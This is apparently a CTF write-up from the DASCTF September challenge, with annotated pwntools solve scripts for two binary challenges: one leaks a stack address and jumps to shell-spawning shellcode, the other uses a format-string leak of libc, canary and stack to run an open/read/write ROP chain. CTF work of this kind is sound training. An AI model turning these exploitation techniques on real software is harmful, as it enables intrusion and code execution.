争取以后每个月赛都参加!

DASCTF Sept X 浙江工业大学秋季挑战赛

image-20210926103720313

hehepwn

栈溢出payload会被'\x00'截断,那就只覆盖个返回地址

泄露栈地址,然后栈溢出跳到栈上的shellcode

# -*- coding: UTF-8 -*-
# Solve script for the "hehepwn" challenge (binary ./bypwn). Flow, as the
# writeup above describes it: leak a stack address, then overwrite only the
# saved return address so execution lands on shellcode that sits in the same
# stack buffer.
# NOTE(review): str and bytes are mixed freely ('\x7f', ljust(8,'\x00'),
# 'a'*0x20) — this is Python 2 pwntools style; under Python 3 these literals
# would need b'' prefixes. Confirm which interpreter the author used.
from pwn import *
import sys
context.log_level='debug'   # print every byte sent/received
context.arch='amd64'        # asm()/shellcraft below emit x86-64 code

# Mode toggle: non-zero -> talk to the remote challenge instance, zero -> run
# the local binary under pwntools (the bodies were un-indented in the paste).
flag=1
if flag:
    sh = remote('node4.buuoj.cn', 28964)
else:
    sh = process("./bypwn")

# libc is loaded here but never referenced later in this script (template
# leftover); elf is likewise unused below.
libc=ELF('/home/wendy/Desktop/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc.so.6',checksec=False)
elf=ELF('./bypwn')
# pwntools shorthands; only sla, leak and ti are actually used in this script.
sa = lambda s,n : sh.sendafter(s,n)
sla = lambda s,n : sh.sendlineafter(s,n)
sl = lambda s : sh.sendline(s)
sd = lambda s : sh.send(s)
rc = lambda n : sh.recv(n)
ru = lambda s : sh.recvuntil(s)
ti = lambda : sh.interactive()
# Log a named address in hex at "success" level.
leak = lambda name,addr :log.success(name+":"+hex(addr))

# Manual breakpoint: wait for a keypress so a debugger can be attached before
# the first interaction.
pause()
# Send 0x20 non-NUL bytes after the 'input:' prompt. Per the writeup the
# program's reply then discloses a stack pointer; presumably the echo runs
# past the buffer into an adjacent pointer — confirm against the binary.
sla('input:','a'*0x20)
# Read up to and including the first 0x7f byte (the high byte of a typical
# user-space pointer), keep the last 6 bytes, zero-pad to 8 and decode as a
# little-endian u64.
stack_addr = u64(sh.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
leak('stack_addr',stack_addr)

pause()

# execve("/bin/sh") shellcode first, padded with 'b' (never NUL, since the
# writeup notes the copy stops at the first '\x00') up to offset 0x58 ...
shellcode=asm(shellcraft.sh())
pay=shellcode.ljust(0x58,'b')
# ... followed by a single return address pointing back into the buffer.
# Only this one slot is overwritten; the high NUL bytes of p64() are the very
# last bytes of the payload, which is what makes the truncation harmless.
# The exact offsets (0x58, -0x50) are frame-layout constants from the
# challenge binary — not derivable from this script alone.
# NOTE(review): jumping to stack-resident shellcode only works when the stack
# is executable (NX off); checksec on the binary would confirm.
pay+=p64(stack_addr-0x50)

sla('EASY PWN PWN PWN~',pay)
# gdb.attach(sh)
# Hand the resulting shell over to the user.
ti()

hahapwn

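# -*- coding: UTF-8 -*-
# Solve script for the "hahapwn" challenge (binary ./pwn). A format-string
# read in the name prompt leaks a libc pointer, the stack canary and a stack
# address; the second prompt is then overflowed with an open/read/write ROP
# chain that prints the file "flag" to stdout.
# NOTE(review): str and bytes are mixed ('\x00' fills, str payloads) — this is
# Python 2 pwntools style; under Python 3 these literals would need b''
# prefixes. Confirm which interpreter the author used.
# Changes vs. the pasted version: the if/else bodies are re-indented (they were
# a SyntaxError at column 0) and the flag-file address is stored in
# `flag_addr` instead of clobbering the `flag` mode toggle.
from pwn import *
import sys
context.log_level='debug'   # print every byte sent/received
context.arch='amd64'        # p64()/u64() and gadget layout assume x86-64

# Mode toggle: non-zero -> talk to the remote challenge instance, zero -> run
# the local binary under pwntools.
flag=1
if flag:
    sh = remote('node4.buuoj.cn', 29107)
else:
    sh = process("./pwn")

# libc=ELF('libc.so.6')
# The 2.23 libc is needed for symbol lookups (open/read/write) once rebased.
libc=ELF('/home/wendy/Desktop/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc.so.6',checksec=False)
elf=ELF('./pwn')
# pwntools shorthands; only sla, ru, leak and ti are actually used below.
sa = lambda s,n : sh.sendafter(s,n)
sla = lambda s,n : sh.sendlineafter(s,n)
sl = lambda s : sh.sendline(s)
sd = lambda s : sh.send(s)
rc = lambda n : sh.recv(n)
ru = lambda s : sh.recvuntil(s)
ti = lambda : sh.interactive()
# Log a named address in hex at "success" level.
leak = lambda name,addr :log.success(name+":"+hex(addr))

# Stage 1: format-string leak. %25$p / %27$p / %28$p print three stack slots
# as pointers, separated by '.' so the reply can be split on the way back.
# The name is printed back through an attacker-controlled format string —
# that uncontrolled format string is the root defect; everything below
# (including the canary bypass) follows from it.
pay='%25$p.%27$p.%28$p'
pay=pay.ljust(0x20,'\x00')
# Plant the NUL-terminated path "flag" right after the 0x20-byte name so the
# ROP chain can pass its stack address to open(); that address is recovered
# from the third leaked slot below (stack_addr - 0xe0).
pay+='flag\x00\x00\x00\x00'
sla('What is your name?',pay)
# 0x6ffc4
# Slot 25: a pointer into libc. 0x6ffc4 is its offset from the libc base for
# the libc loaded above (per the author's comment) -> rebase libc.
ru('0x')
libc_base = int(sh.recvuntil('.',drop=True),16) - 0x6ffc4
leak('libc_base',libc_base)
libc.address=libc_base
# Slot 27: the stack canary, replayed verbatim in the overflow below.
ru('0x')
canary = int(sh.recvuntil('.',drop=True),16)
leak('canary',canary)
# 0xe0
# Slot 28: a stack pointer; the planted "flag" string sits 0xe0 below it.
ru('0x')
stack_addr = int(sh.recvuntil('\n',drop=True),16)
flag_addr=stack_addr -0xe0
leak('flag',flag_addr)

# Gadgets: `pop rdi; ret` from the binary (the fixed 0x400943 address suggests
# a non-PIE build) and `pop rsi`/`pop rdx` gadgets from the rebased libc.
pop_rdi=0x0000000000400943
pop_rsi=0x00000000000202f8+libc_base
pop_rdx=0x0000000000001b92+libc_base

# Stage 2: stack overflow. 0x70-8 filler bytes reach the canary slot, then the
# leaked canary, one 8-byte slot (presumably the saved rbp), and the chain:
#   open(flag_addr, 0)        -- 0 == O_RDONLY; the chain assumes it returns fd 3
#   read(3, flag_addr, 0x50)  -- reuse the name buffer as scratch space
#   write(1, flag_addr, 0x50) -- print the contents to stdout
# An open/read/write chain is used instead of system(); presumably execve is
# unavailable in this challenge — confirm against the binary.
orw_rop='a'*(0x70-8)+p64(canary)+p64(0)
orw_rop+=p64(pop_rdi)+p64(flag_addr)
orw_rop+=p64(pop_rsi)+p64(0)
orw_rop+=p64(libc.sym['open'])
orw_rop+=p64(pop_rdi)+p64(3)
orw_rop+=p64(pop_rsi)+p64(flag_addr)
orw_rop+=p64(pop_rdx)+p64(0x50)
orw_rop+=p64(libc.sym['read'])
orw_rop+=p64(pop_rdi)+p64(1)
orw_rop+=p64(pop_rsi)+p64(flag_addr)
orw_rop+=p64(pop_rdx)+p64(0x50)
orw_rop+=p64(libc.sym['write'])

# pause()
sla('What can we help you?',orw_rop)
# gdb.attach(sh)
# Keep the session open so the written-out contents can be read.
ti()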

datasystem